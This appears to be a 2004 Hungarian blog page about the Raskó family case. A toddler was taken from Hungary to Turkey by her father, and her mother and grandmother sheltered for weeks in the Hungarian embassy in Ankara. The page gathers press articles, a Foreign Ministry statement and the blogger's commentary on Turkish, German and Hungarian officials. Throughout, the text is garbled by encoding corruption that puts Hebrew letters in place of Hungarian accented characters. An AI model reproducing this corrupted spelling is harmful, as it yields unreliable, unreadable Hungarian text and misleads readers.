יs bםzom abban, hogy meg is fogjuk talבlni. Azt gondolom, hogy tizennyolc יves kora utבn minden gyerek maga dצnthet a sorsבrףl, de addig az יn felelőssיgem a lehető legkedvezőbb kצrlmיnyeket megteremteni neki. Az, hogy itthon lehetnk, mיg ha rejtőzkצdve is, ףriבsi előrelיpיs a korבbbi בllapothoz kיpest. Hבlבs kצszצnettel tartozom a magyar klgyminisztיriumnak יs az ankarai magyar nagykצvetsיg צsszes munkatבrsבnak, akik, תgy יrzem, messze a hivatali kצtelessיgkצn tתlmenően lיptek fel יrtnk, gondoskodtak rףlunk. Ezt soha nem tudom meghבlבlni nekik.</div><div align="justify"></span> <br /></div><div align="justify"><strong><span style="color:#ff0000;"></span></strong></div><div align="justify"><strong><span style="color:#ff0000;">Efendi kיt megjegyzיse (2004. okt. 6.):</span></strong></div><div align="justify"><span style="color:#ff0000;"> <br /></span></div><div align="justify"><span style="color:#ff0000;"></span></div><div align="justify"><strong><span style="color:#ff0000;">1. A reklבm helye</span></strong></div><div align="justify"> <br /></div><div align="justify"></div><div align="justify">Raskף Emese gyvיdje Dilek Midik tצrצk gyvיdnő (Ada Hukuk Brosu azaz Ada Jogi Iroda) volt. gy tudom, jףl lבtta el a dolgבt, a szksיges empבtiבval יs igyekezettel. Csalבdjogi gyek mellett mבs bntetőgyekhez is יrt. A tצrצk mellett nיmetl beszיl. Ha bבrkinek problיmבja van, megkeresheti (tצrצkl יs nיmetl) a (90 312) 438 94 90) telefonszבmon vagy a (90 312) 438 94 91 fax-szבmon. E-mail: <a href="mailto:adahukukburosu@yahoo.de">adahukukburosu@yahoo.de</a> vagy <a href="mailto:dilekmidik@mynet.com">dilekmidik@mynet.com</a>. Ne legyen rב szksיgetek, meg pיnzbe is kerl.</div><div align="justify"> <br /></div><div align="justify"></div><div align="justify"><strong><span style="color:#ff0000;">2. WANTED!</span></strong></div><div align="justify"> <br /></div><div align="justify"></div><div align="justify">(Fatih ײzbas a Raskף csalבd egyik tagjבnak צnkיnyesen magבnבl tartott autףjבval kףszבl, lehet, hogy יppen Magyarorszבgon. Ezיrt lehetőleg NE vבsבrolj olcsף pיnzen ....) <em>ez mבr aktualitבsבt veszםtette, a kocsi kצzben visszakerlt, hבla a tצrצk rendőrsיgnek!</em></div><div align="justify"> </div><div align="center"><strong>Mבsfיl hףnapos fogsבgban Ankarבban <br /></strong><em>Mindent elkצvetett a magyar klgyminisztיrium, hogy visszakapjuk a kislבnyt</em></div><div align="center"><em>Nיpszava, Forrף Evelyn, okt. 6.</em></div><div align="justify"></div><div align="justify"> <br />Mindenkיppen Magyarorszבgon szeretnיk szlni - ezt ismיtelgette Emese, amikor terhessיgיről beszיlgettnk. Akkor mבr egy hףnapja volt hבrom יves lבnyבval יs יdesanyjבval, Krisztinבval az ankarai magyar nagykצvetsיgen. Akkor egyבltalבn nem volt bםztatף a helyzet, a tצrצk bםrףsבg nem siette el a dolgokat, vagyis gyakorlatilag nem csinבlt semmit. Kilבtבstalanul teltek a napok, nem enyhםtette idegeskedיsket az sem, hogy a nagykצvetsיg יpletיben lakףk szinte lestיk kםvבnsבgukat. Az egyik csalבd elvבllalta a piszkos ruhבk mosבsבt, a mבsik bevבsבrolni jבrt nekik, a harmadik a vasalףt adta kצlcsצn, a negyedik nיha vigyבzott Szofira, amikor mבr mindkיt felnőtt kidőlt.</div><div align="justify"> <br />ֹs kצzben csak jצttek az sms-ek Fatihtףl, a kislבny יs a jצvendő gyermek apjבtףl. Eleinte kemיny hangת zenetek, kיsőbb a fיrfi enyhיbb hangnemben megegyezיst ajבnlott. Emese minden felkםnבlt szalmaszבlba belekapaszkodott, csak engedjיk mבr hazamenni. Fatih szinte naponta tolta ki a megegyezיs hatבridejיt. A lבny csalבdjבnak kocsijבt ő hasznבlta, azzal is prףbבlt zsarolni. Mיg elmegyek edzőtבborba, mיg egy fontos utam van Trabzonba, mיg… Vיg nיlkli kifogבsok, miיrt nem adja vissza az autףt. </div><div align="justify"> <br /></div><div align="justify">Fatih szבmבra a megegyezיs nem csak a gyerekről, az asszonyrףl, hanem az autףrףl is szףlt. Szeptember vיge volt a vיgső hatבridő, a fיrfi azt םgיrte, elmehet az anya is, gyereke is haza, Magyarorszבgra. Nיhבny nappal a hatבridő előtt sűrűsצdtek az sms-ek, egyיrtelműsםtve, hogy nem lesz megבllapodבs. Ismerlek - םrta - ha elengedlek, soha nem fogom lבtni a gyerekeimet. </div><div align="justify"> <br /></div><div align="justify">Aztבn תjra a fenyegetיsek. Mבr nem csak nekik, hanem a Magyarorszבgon lיvő vבllalkozף nagypapבnak is. </div><div align="justify"></div> <br /><div align="justify">Miיrt kellett a mבsodik gyerek, ha nem sikerlt helyreבllםtani a kapcsolatot, kיrdeztem, de Emese, mint akinek srgős dolga van, kiment a szobבbףl. Helyette יdesanyja, Krisztina vבlaszol. </div><div align="justify"> <br /></div><div align="justify">Nיmetorszבgban ismerkedtek meg, Emese ott dolgozott, gyerekfelgyelőkיnt, Fatih ײzbas a hazבjבban, Tצrצkorszבgban ismert birkףzף pedig akkor יppen Nיmetorszבgban יlt. Mint kיsőbb kiderlt, megkapta az בllampolgבrsבgot is. Talבlkozgattak, aztבn a lבny visszament Magyarorszבgra, tanםtףkיpzőt vיgzett. A fיrfi tצbbszצr felkereste, יs Emese egyszer csak terhes lett. Fejיbe vette, mondja Krisztina, hogy addig nem szed fogamzבsgבtlףt, amםg nem szletik kיt gyereke. Szeretetben neveltk Szofit, igen, םgy anyakצnyveztיk, ahogy kiejtjk, az apja nיha meglבtogatta, adott pיnzt, hozott ruhבt, jבtיkot neki - folytatja Krisztina. Tavaly יv vיgיn, ahogy az mבskor is lenni szokott, elvitte nיhבny ףrבra. Nem hozta vissza időre, telefonבlt nיhבnyszor, hogy mindjבrt יrkeznek, de valami kצzbejצtt. Aztבn kikapcsolta a mobiljבt. Az automata jelentkezett, hogy hםvjuk kיsőbb, pillanatnyilag nem kapcsolhatף, előbb magyarul, majd szerbl. Kivitte a gyereket az orszבgbףl, belerakatta a nיmet תtlevelיbe, rבadבsul nem Raskף, hanem ײzbas nיven. </div><div align="justify"> <br /></div><div align="justify">Emese nיhבny hיt mתlva utבnuk jצtt Tצrצkorszבgba, a gyerek יrdekיben mיg egyszer meg akarta prףbבlni vele az egyttיlיst. Nem sikerlt, יs kצzben תjra terhes lett. Amikor elhatבrozta, visszamegy Szofival Magyarorszבgra, a fיrfi elvette az תtlevelיt.</div><div align="justify"> <br /></div><div align="justify">A tצrtיnet tצbbi rיsze mבr szinte a nyilvבnossבg előtt zajlott, a konzultףl kapott ideiglenes iratokkal megprףbבlt elmenni, a fיrfi rokonsבga a replőtיrre is kצvette, יs fellבrmבzta az ottani hatףsבgokat, azzal, hogy el akarjבk rabolni a gyereket. Ekkor kerestek יs kaptak menedיket a nagykצvetsיgen, ahol vיgl is mבsfיl hףnapot tצltצttek. Akkor mבr velk volt Emese יdesanyja is. Krisztina trelmes, jףlelkű asszony. Aggףdott nagyon a lבnyביrt, meg azיrt is kesergett, hogy kijצn a gyakorlatbףl, kozmetikus יs gyףgymasszőr. Kיrlelte az ott lakף nőket, legalבbb egyszer vessיk alב magukat egy alapos masszםrozבsnak. Mondhatom, jףt tett mindannyiunkkal, megfestette a szempillבnkat, kimasszםrozta a vבllunkbףl a csomףkat, יs kצzben jףkat beszיlgettnk.</div><div align="justify"> <br /></div><div align="justify">Emese a mבsfיl hףnap alatt egyetlen egyszer hagyta el az יpletet, a legnagyobb titokban orvoshoz vittיk, kontrollra, megtudni, hogyan fejlődik a baba. Szofi is szםvesen ment volna ki, de a napi sיtבja az volt, hogy levitte nagymamבjבval a szemetet, יs nיha kilt az erkיlyre. Hogy benne mit tett a kיnyszerű fogsבg, majd csak kיsőbb derl ki. Jףkedvיt megőrizte, nevetett, jבtszott akkor is, amikor arra vבrtak, hogy klצn busszal kivigyיk őket az osztrבk lיgitבrsasבg Bיcsbe indulף gיpיre, a fצldi utaskםsיrő צlיbe telepedett, יs a "tףki-wףki"-jבt nyomogatta.</div><div align="justify"> <br /></div><div align="justify">Ez a tצrtיnet hetek ףta megםrבsra vבrt, de nem tehettem, mert a csalבdnak םgיretet tettem, addig egyetlen sort sem kצzlצk, amםg el nem hagyjבk Ankarבt. Oktףber mבsodikבn, azutבn, hogy az gyיszsיg visszavonta beadvבnyבt, amelynek יrtelmיben nem hagyhattבk el az orszבgot, Raskף Emese, lבnya Szofi, יs יdesanyja Krisztina elhagyta a nagykצvetsיg יpletיt, יs egy Bיcs felי tartף osztrבk gיpen elutazott Tצrצkorszבgbףl.</div><div align="justify"> <br /></div><div align="justify"></div><div align="justify"> <br /></div><div align="center"><strong></strong></div><div align="center"><strong>A Klgy kצzlemיnye: <br />Hazatיrt a Raskף csalבd </strong></div><div align="center"><strong>2004. okt. 4.</strong></div><p><strong></strong></p><p><strong></p><div align="justify"></strong>Mintegy tםz hףnapos tבvollיt utבn – az ankarai magyar nagykצvetsיg יs a Klgyminisztיrium tצbbszצri fellיpיse utבn – 2004. oktףber 2-בn, szombaton hazaיrkezett a hבromיves Raskף Szofi יs יdesanyja, Raskף Emese. A magyar בllampolgבrok hazatיrיsיt egy ankarai kerleti bםrףsבgi hatבrozat tette lehetővי. <br /> <br />A szolnoki kislבnyt az יv elejיn apja, a tצrצk בllampolgבrsבgת ײzbas Fatih az יdesanya tudomבsa יs engedיlye nיlkl vitte Tצrצkorszבgba. Raskף Emese a helyzet bיkיs tisztבzבsa יs gyermeke hazahozatala cיljבbףl mבrciusban Ankarבba utazott, ahol azonban ײzbas mindkettejk תtlevelיt elvette יs a mai napig nem adta vissza, mikצzben tצbb alkalommal erőszakosan lיpett fel. Raskף Emesיt יs rokonait az ײzbas csalבd tצbb םzben יletveszיlyesen megfenyegette. <br /> <br />Augusztus kצzepיn az ankarai magyar kיpviselet – תtlevיl hiבnyבban – hazatיrיsi igazolvבnyt בllםtott ki Raskף Emese יs Szofi szבmבra, akik elutazבsבt azonban a tצrצk hatףsבgok arra valף hivatkozבssal utasםtottבk el, hogy a beutazבs mבs okmבnyokkal tצrtיnt. A sikertelen hazautazבsi kםsיrletet kצvetően anya יs gyermeke az ankarai nagykצvetsיgen talבlt menedיket. <br /> <br />Augusztus ףta – azt kצvetően, hogy az יdesanya szemיlyes prףbבlkozבsai rendre kudarcot vallottak – az ankarai nagykצvetsיg, valamint a Klgyminisztיrium folyamatosan eljבrt a tצrצk hatףsבgoknבl. Tצbb alkalommal jegyzיkben jelezte, hogy a gyermek יs az יdesanya biztonsבga Tצrצkorszבgban nem garantבlt יs kיrte a jogtalanul visszatartott csalבdanya יs gyermeke elutazבsבnak engedיlyezיsיt. Szalay Zsolt ankarai magyar nagykצvet szemיlyes talבlkozףt kיrt az gyben a tצrצk igazsבggyi minisztertől. Minthogy a korבbbi erőfeszםtיsek nem bizonyultak elיgsיgesnek, szeptember 28-בn Bבrsony Andrבs, a Klgyminisztיrium politikai בllamtitkבra hivatalבba kיrette Tצrצkorszבg budapesti nagykצvetיt. Nyomatיkosan kיrte, hogy a tצrצk hatףsבgok tegyיk lehetővי Raskףיk hazatיrיsיt. Ezt vיgl az oktףber 1-i dבtumת ankarai bםrףsבgi hatבrozat – amely egy korבbbi tצrצk gyיszsיgi dצntיst יrvיnytelenםtett – tette lehetővי. <br /> <br />Tekintettel az יdesapa korבbbi tצbbszצri erőszakos fellיpיsיre, magyarorszבgi hazatיrיse ףta anya יs gyermeke ismeretlen helyen tartףzkodik. <br /> <br />A Klgyminisztיrium kצszצnetיt fejezi ki a tצrצk hatףsבgoknak, hogy jogszerű eljבrבs keretיben lehetővי tettיk Raskף Emese יs kiskorת gyermeke hazatיrיsיt. <br /> <br /><span style="color:#ff0000;">Efendi kommentבrja:</span></div><div align="justify"><span style="color:#ff0000;"> <br /></span>Raskף Emese יs Raskף Szofi kבlvבriבja kצzel 50 napig tartott az ankarai magyar nagykצvetsיgen.</div><div align="justify"> <br />Az gy tanulsבgai?</div><div align="justify"> <br />A Klgynek sikerlt megoldania a Raskף-csalבd hazahozatalבt. Nem a hבgai egyezmיny alapjבn szletett jogi megoldבs, de visszaבllt a tavaly decemberi kiindulףhelyzet: Raskף Szofi visszakerlt oda, ahol szletיse ףta יdesanyjבval יlt, azaz Magyarorszבgra. Lיtrejצttek a feltיtelek a kislבny יrdekeit szem előtt tartף tisztessיges megoldבshoz.</div><div align="justify"> <br />Szףval, Szofi hazahozatala miatt nיmikיppen erősצtt bizalmunk a magyar brokrבciבban.</div><div align="justify"> <br />A mבsodik tanulsבg, hogy a tצrצk hatףsבgok nem בlltak a helyzet magaslatבn, amikor egy nemzetkצzi szerződיs előםrבsainak kellett (volna) יrvיnyt szereznik.</div><div align="justify"> <br />A hבgai egyezmיny יppen azיrt jצtt lיtre, hogy a jogellenesen klfצldre vitt gyerekek gyיben - a kiskorתak יrdekיben - a bםrףsבgi eljבrבs ne tartson יvekig.</div><div align="justify"> <br />Raskף Emese augusztus 19-יn nyתjtotta be keresetיt a tצrצk Igazsבggyi Minisztיriumhoz. Az eljבrבs az lett volna, hogy az IM tovבbbםtja a keresetet a tצrצk csalבdjogi bםrףsבghoz, az pedig hatבrozatot hoz arrףl, visszadja-e Szofit Magyarorszבgra vagy sem. Az egיsz procedתrבra 6 hיt בllt rendelkezיsre- בm Raskף Emese gye ez idő alatt el sem jutott a bםrףsבghoz. Raskף Emesיnek szeptember 30-בn mבr a tצrצk bםrףsבg hatבrozatבval kellett volna rendelkeznie, בm Szofi papםrjait mיg mindig a tצrצk IM brצkratבi tologatjבk.</div><div align="justify"> <br />Ez, sajnos, rossz fיnyt vet az Eurףpai Uniףhoz csatlakozni kםvבnף Tצrצkorszבgra, nem erősםti a bizalmat a tצrצk בllamigazgatבsban יs az igazsבgszolgבltatבsban.</div><div align="justify"> <br />A harmadik tanulsבg a nיmet hatףsבgok magatartבsa. Mint tudjuk, Szofi apja nיmet בllampolgבr, aki a kislבny יdesanyjבnak tudta יs hozzבjבrulבsa nיlkl elיrte nיmet תtiokmבny kiבllםtבsבt Nיmetorszבgban, s a Magyarorszבgrףl elrabolt Szofit azzal vitte januבr első napjaiban - azaz 9 hףnapja - Tצrצkorszבgba.</div><div align="justify"> <br />Mivel jבrultak hozzב az elmתlt mבsfיl hףnapban a nיmet hatףsבgok Szofi gyיnek megoldבsבhoz יs a csalבd hazautazבsבhoz Tצrצkorszבgbףl? Semmivel. Felhבborםtף יs elfogadhatatlan.</div><div align="justify"> <br />Mיg egy utolsף tanulsבg. A magyar mיdia elיg sokat foglalkozott Szofi יs csalבdja tצrצkorszבgi megprףbבltatבsaival, tehבt a magyar kצzvיlemיny bizonyos rיszיhez eljutottak a Raskף-csalבddal kapcsolatos hםrek.</div><div align="justify"> <br />Az elmתlt mבsfיl hףnap alatt azonban sem Tצrצkorszבg, sem Nיmetorszבg kיpviselői nem tartottבk fontosnak, hogy a magyar kצzvיlemיny előtt megszףlaljanak a Raskף-gyben. Vajon miיrt?</div><div align="justify"> <br />Bףnusz kיrdיs: hol van יs mikor kerl haza a 7 יves Mehmet Karcsika, akit tצrצk-magyar apja hבrom hףnappal ezelőtt rabolt el Magyarorszבgrףl?</div><div align="justify"> <br /></div><div align="center"> <br /><span style="font-size:130%;"><strong>Kיsőn kezdtek el intיzkedni az ankarai hatףsבgok</strong></span></div><div align="center">Nיpszava online (Forrף Evelyn, Ankara), okt. 4.</div><div align="justify"> <br /></div><div align="justify">Az osztrבk lיgitבrsasבg Ankara-Bיcs kצzצtti menetrendszerinti jבratבn utazott el az a magyar csalבd, amely mבsfיl hףnapon keresztl az ankarai magyar nagykצvetsיgen talבlt menedיket. A neves tצrצk birkףzף, Fatih ײzbas tavaly יv vיgיn elrabolta Magyarorszבgrףl kislבnyבt, Szofit. Az יdesanya, Raskף Emese tavasszal utבnuk jצtt, יs megprףbבltבk helyreבllםtani kapcsolatukat. Miutבn kiderlt, hogy erre nincs esיly, a nő a gyerekkel vissza akart menni Magyarorszבgra, de ײzbas ezt megakadבlyozta azzal, hogy elvette a nő תtlevelיt. A gyerek a fיrfi תtlevelיben szerepelt, rבadבsul az egy nיmet dokumentum volt, mert a birkףzף nיmet יs tצrצk בllampolgבr. <br /> <br />Az asszony יs a gyerek augusztus kצzepיn a magyar hatףsבgoktףl kapott okmבnyokkal el akart utazni, de a fיrfi rokonsבga fellבrmבzta a replőtיri rendőrsיget, azzal, hogy az apa nem jבrult hozzב a gyerek tבvozבsבhoz. A tצrצk hatףsבgok visszatartottבk őket, vיgl a helyszםnen lיvő magyar diplomatבk az ankarai magyar nagykצvetsיgre vittיk az anyבt, a gyereket, יs az őket kםsיrő nagymamבt. A dolgot bonyolםtotta, hogy az anya ismיt terhes, tתl van a hatodik hףnapon. Az apבval nem sikerlt megבllapodבsra jutni, a csalבd a bםrףsבgi dצntיsre vבrt, ami nem sok jףval kecsegtetett. Hosszas halogatבs utבn a tצrצk hatףsבgok csak akkor kezdtek intיzkedni, amikor Bבrsony Andrבs klgyi בllamtitkבr magבhoz kיrette a budapesti tצrצk nagykצvetet, יs felszףlםtotta az gy rendezיsיre. Ezt kצvetően vonta vissza az illetיkes gyיszsיg azt a dצntיsיt, amelynek יrtelmיben Raskףיk eddig nem hagyhattבk el az orszבgot. Komoly biztonsבgi intיzkedיsek kצzepette vittיk őket szombaton dיlutבn az ankarai replőtיrre, יs tettיk fel az osztrבk lיgitבrsasבg Bיcsbe tartף jבratבra. <br /></div><div align="justify"> <br /> <br /></div><div align="justify">Szofi mיg nem tיrhet haza <br /><strong><span style="font-size:130%;">Nem tudni, hogyan szerzett nיmet papםrokat a tצrצk apa</span></strong></div><div align="justify">Nיpszabadsבg, 2004. oktףber 1.</div><div align="justify"> <br /></div><div align="justify">Az orvosok szerint minיl előbb nyugodt kצrlmיnyek kצzי kellene kerlnie a hat hete az ankarai magyar nagykצvetsיgen menedיket kיrő hיt hףnapos terhes Raskף Emesיnek - tudta meg lapunk.</div><div align="justify"> <br />Az יdesanya hבromיves kislבnyבval vבrja, hogy a tצrצk igazsבggyi minisztיrium dצntsצn arrףl, hazahozhatja-e gyermekיt, akit az apja, ײzbas Fatih egykori birkףzף olimpikon januבrban az anya tudta nיlkl vitt Tצrצkorszבgba.</div><div align="justify"> <br />Emese יs Szofi a nagymamבval egytt a nagykצvetsיg vendיglakבsבban laknak augusztus kצzepe ףta. A kצrlmיnyek jףk ugyan - frdőszoba, konyha, hבlףszobבk בllnak a rendelkezיskre - de a bizonytalan helyzet veszיlyeztetheti az יlettבrsבtףl februבrban ismיt teherbe esett asszony egיszsיgיt. Telefonon tצbbszצr יletveszיlyesen megfenyegettיk a Raskף csalבdot, םgy nem merik a nagykצvetsיg יpletיt elhagyni egy pillanatra sem. A bevבsבrlבst םgy a kצvetsיg alkalmazottai vיgzik.</div><div align="justify"> <br />A Klgyminisztיrium politikai בllamtitkבra a hיten behםvatta Tצrצkorszבg Budapesti nagykצvetיt. Bבrsony Andrבs nyomatיkosan kיrte a tצrצk diplomatבt, hogy a tצrצk hatףsבgok mielőbb hozzבk meg dצntיsket a kislבny kiutazבsi tilalmבnak feloldבsa יrdekיben. Az יdesanya kיrיsיre a magyar konzul hazatיrיsi igazolבst בllםtott ki, בm azzal Szofi mיgsem hagyhatta el az orszבgot.</div><div align="justify"> <br />A tצrצk fיl szerint ugyanis Szofi nיmet papםrokkal יrkezett az orszבgba, םgy azt csak azokkal hagyhatja el. Nem vilבgos azonban, hogy a Nיmetorszבgban is יlő ײzbas hogyan יrte el, hogy a kislבnynak nיmet papםrjai legyenek, amikor ehhez az יdesanya hozzבjבrulבsa kell. Raskף Emese korבbban elmondta: sosem jבrult hozzב, hogy lבnyבnak mבs בllampolgבrsבga is legyen a magyaron kםvl. Berlinben azonban nem sikerlt vבlaszt kapni a nיmet hatףsבgoktףl arra, hogy Szofi nיmet iratai valףdiak-e.</div><div align="justify"> <br />A tצrצk igazsבggyi minisztיriumnak tegnapig kellett volna dצntיst hoznia, בm ez egyelőre nem tצrtיnt meg.</div><div align="justify"> <br /></div><div align="justify"></div><div align="center"><span style="color:#ff0000;"><strong>" Diplomבciai problיma a vבlogatott birkףzף magyar felesיge miatt"</strong></span></div><div align="center"><span style="font-size:85%;color:#333333;">Hrriyet, 2004. szept. 30.</span></div><div align="center"> <br /></div><div align="left"><span style="color:#ff0000;"><strong></strong></span></div><div align="justify"><span style="color:#333333;">A magyar Klgy a budapesti tצrצk nagykצvetettצl kיrte, hogy a tצrצk fיl a lehető legrצvidebb időn bell engedיlyezze Raskף Emese יs kislבnya hazatיrיsיt יs vonja vissza a rבjuk vonatkozף kiutazבsi tilalmat. Azt is szףvב tettיk, hogy a tצrצk hatףsבgok augusztus ףta nem יrtek el eredmיnyt a Raskף-gy megoldבsבban. A cikk szerint a magyar fיl תgy vיli, ײzbas יs csalבdja rosszul bבnt Raskף Emesיvel יs Szofival, s a tצrצk hatףsבgok megalapozatlanul tiltottבk meg kiutazבsukat.</span></div><div align="justify"><span style="color:#333333;"></span> <br /></div><div align="center"><span style="color:#ff0000;"><strong>Lבnyom nיlkl soha - magyar nő Ankarבban</strong></span></div><div align="center"><span style="color:#ff0000;"><strong>Haladיktalan intיzkedיst vבr a Klgyminisztיrium Ankarבtףl Raskף Emese gyיben</strong></span></div><div align="center"><span style="color:#333333;"><a href="http://ma.hu/page/cikk/ab/0/100721/1">ma.hu szept. 29.</a></span></div><div align="justify"><span style="color:#333333;"></span> <br /></div><div align="justify">A szolnoki nő mבrciusban utazott ki Tצrצkorszבgba, hogy hazahozza 3 יves kislבnyבt. Ez azףta sem sikerlt neki. A Klgyminisztיriumba kיrette Tצrצkorszבg budapesti nagykצvetיt Bבrsony Andrבs politikai בllamtitkבr יs kצzbenjבrבsבt kיrte Raskף Emese יs kislבnya Tצrצkorszבgbףl valף kiutazבsi tilalmבnak feloldבsa יrdekיben. A keddi budapesti megbeszיlיsen Bבrsony Andrבs nyomatיkosan kיrte Aydan Karahant, hogy a tצrצk hatףsבgok az gy fontossבgבnak יs jelentősיgיnek megfelelően műkצdjenek kצzre abban, hogy az anya יs kiskorת gyermeke haladיktalanul hazautazhasson Magyarorszבgra. A 3 יves Raskף Szofit ez יv januבrjבban יdesanyja tudta יs engedיlye nיlkl nיmet תti okmבnyokkal vitte יdesapja Tצrצkorszבgba. "Az יdesanya mבrciusban יrkezett Ankarבba. ײzbas, akkor magyar תtlevelיt, valamint a kislבny magyar תtlevelיt elvette, azokat a mai napig nem adta vissza יs megakadבlyozta, hogy anya יs gyermeke visszautazzon Magyarorszבgra" - szerepel a tבrca kצzlemיnyיben. Szofi יs יdesanyja az יdesapa יs csalבdjבnak erőszakos magatartבsa miatt, az ankarai magyar nagykצvetsיgen keresett vיdelmet - kצzצlte a minisztיrium szףvivője. Az יdesanya kיrיsיre a magyar konzul hazatיrיsi igazolvבnyt בllםtott ki szבmukra, בm a tצrצk hatףsבgok nem engedtיk őket elutazni. "A magyar nagykצvetsיg augusztus kצzepe ףta tצbbszצr kיrte a tצrצk hatףsבgok intיzkedיsיt annak יrdekיben, hogy a magyar בllampolgבrok mielőbb hazautazhassanak. E kיrיsek mindmבig vבlasz, illetve יrdemi reagבlבs nיlkl maradtak" - hangsתlyozta Polgבr Viktor.</div><div align="justify"> <br />Apja lבnya? A szolnoki Raskף Emese hבrom יvvel ezelőtt, hבzassבgon kםvli kapcsolatbףl szlte meg lבnyבt, akit szlei szolnoki hבzבban egyedl nevelt. A kislבny apja a Tצrצkorszבgban nיpszerű Fatih ײzbas, egykori birkףzף olimpikon, Eurףpa-bajnok, akivel az asszony Nיmetorszבgban ismerkedett meg - olvashatף a nol.hu-n. Az apa tצbbszצr is meglבtogatta Magyarorszבgon a gyereket, majd tavaly szilveszterkor elszצktette a lבnyבt, יs valףszםnűleg hamis nיmet תtlevיllel Tצrצkorszבgba vitte. Innen prףbבlta meg augusztus 19-יn hazamenekםteni gyermekיt a magyar asszony, בm nem jבrt sikerrel. Az תtlevיlkezelők nem engedtיk őket felszבllni a replőgיpre, mondvבn: a kislבny nיmet תtlevיllel lיpett be az orszבgba, ezיrt magyar papםrokkal nem tבvozhat. Szofi יs יdesanyja ezt kצvetően az ankarai magyar nagykצvetsיgen kיrt יs kapott menedיket. Az asszony augusztus kצzepיn a tצrצk igazsבggyi minisztיriumhoz fordult, hogy engedיlyezzיk gyermeke kiadatבsבt. Dokumentumokkal igazolta, hogy Szofi magyar בllampolgבr, Szolnokon nőtt fel, s hivatalos gondviselője egyedl az יdesanyja. A Nיpszabadsבg emlיkeztet: a tצrצk minisztיriumnak a tצrvיnyek szerint hat hיt בll rendelkezיsיre, hogy dצntsצn az gyben - ez a hatבridő szeptember 30-בn jבr le.</div><div align="justify"><span style="color:#333333;"></span> <br /></div><div align="center"><span style="color:#ff0000;"><strong></strong></span></div><div align="center"><span style="color:#ff0000;"><strong>A Klgyminisztיriumba kיrettיk a tצrצk nagykצvetet Raskף Emese יs kislבnya hazautazבsa יrdekיben </strong></span></div><div align="center"><span style="color:#ff0000;"><span style="font-size:85%;color:#333333;">2004. szeptember 28., kedd (MTI)</span></span></div><div align="center"></div><p align="justify"><span style="color:#ff0000;"><span style="color:#333333;">A Klgyminisztיriumba kיrette Tצrצkorszבg budapesti nagykצvetיt Bבrsony Andrבs politikai בllamtitkבr יs kצzbenjבrבsבt kיrte Raskף Emese יs kislבnya Tצrצkorszבgbףl valף kiutazבsi tilalmבnak feloldבsa יrdekיben. Ezt a klgyi tבrca szףvivője tudatta kedden az MTI-vel.</span></span></p><p align="justify"><span style="color:#ff0000;"><span style="color:#333333;">"</span></span><span style="color:#ff0000;"><span style="color:#333333;">A keddi budapesti megbeszיlיsen Bבrsony Andrבs nyomatיkosan kיrte Aydan Karahant, hogy a tצrצk hatףsבgok az gy fontossבgבnak יs jelentősיgיnek megfelelően műkצdjenek kצzre abban, hogy az anya יs kiskorת gyermeke haladיktalanul hazautazhasson Magyarorszבgra" - olvashatף Polgבr Viktor kצzlemיnyיben.</span></span></p><p align="justify"><span style="color:#ff0000;"><span style="color:#333333;">A szףvivő kiemelte: Raskף Szofi יs יdesanyja az יdesapa יs csalבdjבnak erőszakos magatartבsa miatt, az ankarai magyar nagykצvetsיgen keresett vיdelmet.</span></span></p><p align="justify"><span style="color:#ff0000;"><span style="color:#333333;">A 3 יves Raskף Szofit ez יv januבrjבban יdesanyja tudta יs engedיlye nיlkl nיmet תti okmבnyokkal vitte יdesapja, a nיpszerű vבlogatott birkףzף ײzbas Fatih Tצrצkorszבgba.</span></span></p><p align="justify"><span style="color:#ff0000;"><span style="color:#333333;">"Az יdesanya mבrciusban יrkezett Ankarבba. ײzbas, akkor magyar תtlevelיt, valamint a kislבny magyar תtlevelיt elvette, azokat a mai napig nem adta vissza יs megakadבlyozta, hogy anya יs gyermeke visszautazzon Magyarorszבgra" - szerepel a kommnikיben. </span></span><span style="color:#ff0000;"><span style="color:#333333;">Az יdesanya kיrיsיre a magyar konzul hazatיrיsi igazolvבnyt בllםtott ki szבmukra, בm a tצrצk hatףsבgok nem engedtיk őket elutazni.</span></span></p><p align="justify"><span style="color:#ff0000;"><span style="color:#333333;">"A magyar nagykצvetsיg augusztus kצzepe ףta tצbbszצr kיrte a tצrצk hatףsבgok intיzkedיsיt annak יrdekיben, hogy a magyar בllampolgבrok mielőbb hazautazhassanak. E kיrיsek mindmבig vבlasz, illetve יrdemi reagבlבs nיlkl maradtak" - hangsתlyozta Polgבr Viktor.</span></span></p><p align="justify"><span style="color:#ff0000;">Efendi kommentבrja:</span></p><p align="justify"><span style="color:#333333;">Raskף Emese a Nיpszabadsבgnak azt nyilatkozta (ld. lent), hogy Szofi apja az צ tudta יs engedיlye nיlkl בllםttatta ki a nיmet תtlevelet, amellyel a nיmet בllampolgבrsבgת fיrfi a kislבnyt Tצrצkorszבgba vitte. Ha jףl יrtelmezem a helyzetet, egy nיmet בllampolgבr kיtes eredet nיmet papםrokkal 9 hףnapja elrabolt egy kiskorת magyar בllampolgבrt Magyarorszבgrףl, יs a nיmet hatףsבgok a jelek szerint mיg semmit nem tettek azיrt, hogy az gyet kivizsgבljבk, ad abszurdum, megoldjבk, mi tצbb, a magyar kצzvיlemיnyt tבjיkoztassבk.</span></p><p align="justify"><span style="color:#333333;">Mi a helyzet vajon Mehmet Tysz Karcsika gyיben? A tצrצk hatףsבgoknak talבn azיrt nem volt idejk Szofival foglalkozni, mert יjjel-nappal Karcsikבt kerestיk? A kisfiת 3 hףnapja tnt el Magyarorszבgrףl, s Papa mintha azt mondta volna, tudja, hol bתjtatjבk Tצrצkorszבgban. </span></p><div align="center"><strong><span style="color:#ff0000;">Budapestről telefonon fenyegettיk meg a gyermekיvel immבr 40 napja az ankarai magyar nagykצvetsיgen tartףzkodף Raskף Emesיt</span></strong></div><div align="center"> <br />Link: <a href="http://www.nol.hu/cikk/334126/">Nיpszabadsבg-hםr: Szofiיk gye nem mozdul Ankarבban</a> szept. 25.</div><div align="justify"> <br /><span style="color:#ff0000;">Efendi kommentבrja (szept. 25.)</div><div align="justify"> <br /><span style="color:#000000;">A magyar hatףsבgok vajon mikor lesznek kיpesek hazahozni a Tצrצkorszבgba kiszצktetett magyar gyerekeket? Szofit tavaly december 31-יn, Karcsikבt idיn jתlius 10-יn vittיk ki jogellenesen Magyarorszבgrףl. Szofi 40 napja van az ankarai magyar kצvetsיgen, Karcsika valahol eltűnt Tצrצkorszבgban. </span></div><div align="justify"> <br /><span style="color:#000000;">A magyar, a tצrצk יs a nיmet igazsבggyi יs bűnldצző hatףsבgok, a magyar konzuli szolgבlat, szבmos diplomatבnk Berlinben, Ankarבban יs Isztambulban, Papa, az gyvיdek, nיmet 